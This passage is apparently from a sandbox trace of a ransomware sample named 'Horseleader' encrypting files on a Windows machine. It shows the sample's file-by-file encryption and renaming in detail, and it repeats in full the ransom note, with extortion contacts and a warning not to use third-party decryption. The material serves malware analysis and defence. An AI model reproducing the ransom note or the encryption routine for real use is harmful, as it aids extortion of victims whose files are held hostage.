files\\microsoft shared\\vba\\vba7\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.447] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.447] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.448] lstrlenA (lpString="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") returned 1368 [0250.449] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.449] CloseHandle (hObject=0x158) returned 1 [0250.449] GetProcessHeap () returned 0x780000 [0250.449] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.449] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VBA7", cAlternateFileName="")) returned 0 [0250.449] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.449] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\#Decrypt#.txt") returned 68 [0250.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.450] lstrlenA (lpString="All 
your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.450] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.451] lstrlenA (lpString="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") returned 1368 [0250.451] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.451] CloseHandle (hObject=0x21c) returned 1 [0250.451] GetProcessHeap () returned 0x780000 [0250.452] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.452] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VC", cAlternateFileName="")) returned 1 [0250.452] lstrcmpiW (lpString1="VC", lpString2="Windows") returned -1 [0250.452] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned 53 [0250.452] lstrcmpW (lpString1="VC", lpString2=".") returned 1 [0250.452] lstrcmpW (lpString1="VC", lpString2="..") returned 1 [0250.452] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.452] GetProcessHeap () returned 0x780000 [0250.452] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 
[0250.452] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*") returned 55 [0250.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.454] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.454] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\.") returned 55 [0250.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.454] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.454] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.454] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\..") returned 56 [0250.454] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.454] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.454] FindNextFileW (in: hFindFile=0x7c6860, 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ef3e00, ftCreationTime.dwHighDateTime=0x1cbd033, ftLastAccessTime.dwLowDateTime=0xd2618ca0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc9ef3e00, ftLastWriteTime.dwHighDateTime=0x1cbd033, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0250.454] lstrcmpiW (lpString1="msdia100.dll", lpString2="Windows") returned -1 [0250.454] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned 66 [0250.454] StrStrIW (lpFirst="msdia100.dll", lpSrch=".horseleader") returned 0x0 [0250.454] lstrcmpW (lpString1="msdia100.dll", lpString2="#Decrypt#.txt") returned 1 [0250.454] lstrcmpW (lpString1="msdia100.dll", lpString2="_uninstalling_.png") returned 1 [0250.454] lstrlenW (lpString=".testttjffg") returned 11 [0250.454] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll", lpSrch=".testttjffg") returned 0x0 [0250.454] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.455] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned 66 
[0250.456] StrStrW (lpFirst="msdia100.dll", lpSrch=".txt") returned 0x0 [0250.456] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=990032) returned 1 [0250.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.456] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.459] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.459] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x765a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.460] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.462] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xecb50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.462] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.465] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.465] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.466] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.466] CloseHandle (hObject=0x158) returned 1 [0250.466] GetProcessHeap () returned 0x780000 [0250.466] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.466] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.horseleader") returned 78 [0250.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.horseleader")) returned 1 [0250.467] GetProcessHeap () returned 
0x780000 [0250.468] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.468] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c53c00, ftCreationTime.dwHighDateTime=0x1cbfdf3, ftLastAccessTime.dwLowDateTime=0xbd2c6940, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc1c53c00, ftLastWriteTime.dwHighDateTime=0x1cbfdf3, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdia90.dll", cAlternateFileName="")) returned 1 [0250.468] lstrcmpiW (lpString1="msdia90.dll", lpString2="Windows") returned -1 [0250.468] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned 65 [0250.468] StrStrIW (lpFirst="msdia90.dll", lpSrch=".horseleader") returned 0x0 [0250.468] lstrcmpW (lpString1="msdia90.dll", lpString2="#Decrypt#.txt") returned 1 [0250.468] lstrcmpW (lpString1="msdia90.dll", lpString2="_uninstalling_.png") returned 1 [0250.468] lstrlenW (lpString=".testttjffg") returned 11 [0250.468] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll", lpSrch=".testttjffg") returned 0x0 [0250.468] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.469] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x158 [0250.469] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned 65 [0250.469] StrStrW (lpFirst="msdia90.dll", lpSrch=".txt") returned 0x0 [0250.469] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=855376) returned 1 [0250.470] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.470] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.475] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.475] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.476] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x65ea8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.477] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.479] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xcbd50, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.479] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.482] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.482] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.482] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.482] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.482] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.483] CloseHandle (hObject=0x158) returned 1 [0250.483] GetProcessHeap () returned 0x780000 [0250.483] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.483] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.horseleader") returned 77 [0250.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\VC\\msdia90.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.horseleader")) returned 1 [0250.485] GetProcessHeap () returned 0x780000 [0250.485] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.485] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c53c00, ftCreationTime.dwHighDateTime=0x1cbfdf3, ftLastAccessTime.dwLowDateTime=0xbd2c6940, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc1c53c00, ftLastWriteTime.dwHighDateTime=0x1cbfdf3, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdia90.dll", cAlternateFileName="")) returned 0 [0250.485] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.485] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\#Decrypt#.txt") returned 67 [0250.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.488] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.488] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.490] lstrlenA (lpString="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") returned 1368 [0250.490] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.490] CloseHandle (hObject=0x21c) returned 1 [0250.490] GetProcessHeap () returned 0x780000 [0250.490] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.490] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VGX", cAlternateFileName="")) returned 1 [0250.490] lstrcmpiW (lpString1="VGX", lpString2="Windows") returned -1 [0250.491] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned 54 [0250.491] lstrcmpW (lpString1="VGX", lpString2=".") returned 1 [0250.491] lstrcmpW (lpString1="VGX", lpString2="..") returned 1 [0250.491] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.491] GetProcessHeap () returned 0x780000 [0250.491] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
